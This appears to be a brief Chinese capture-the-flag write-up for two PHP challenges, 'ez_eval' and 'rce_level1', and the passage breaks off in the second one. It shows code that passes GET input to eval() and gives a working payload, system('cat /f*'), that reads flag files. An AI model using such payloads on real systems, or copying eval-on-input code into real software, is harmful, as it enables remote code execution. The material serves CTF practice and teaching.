ez_eval
123456789 <?phphighlight_file(__FILE__);error_reporting(0);$hubu = $_GET['hubu'];eval($hubu);?>
先进行代码审计,GET传参hubu,并执行命令,没有任何绕过,放开手脚去做
payload:
1?hubu=system('cat /f*'); #直接rce
rce_level1
12345678910 <?phperror_reporting(0);if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag|system|php/i", $c)){ eval($c); } }else{ highlight_file(__FILE__);}
代码审计,发现过滤了关键字flag,sys ...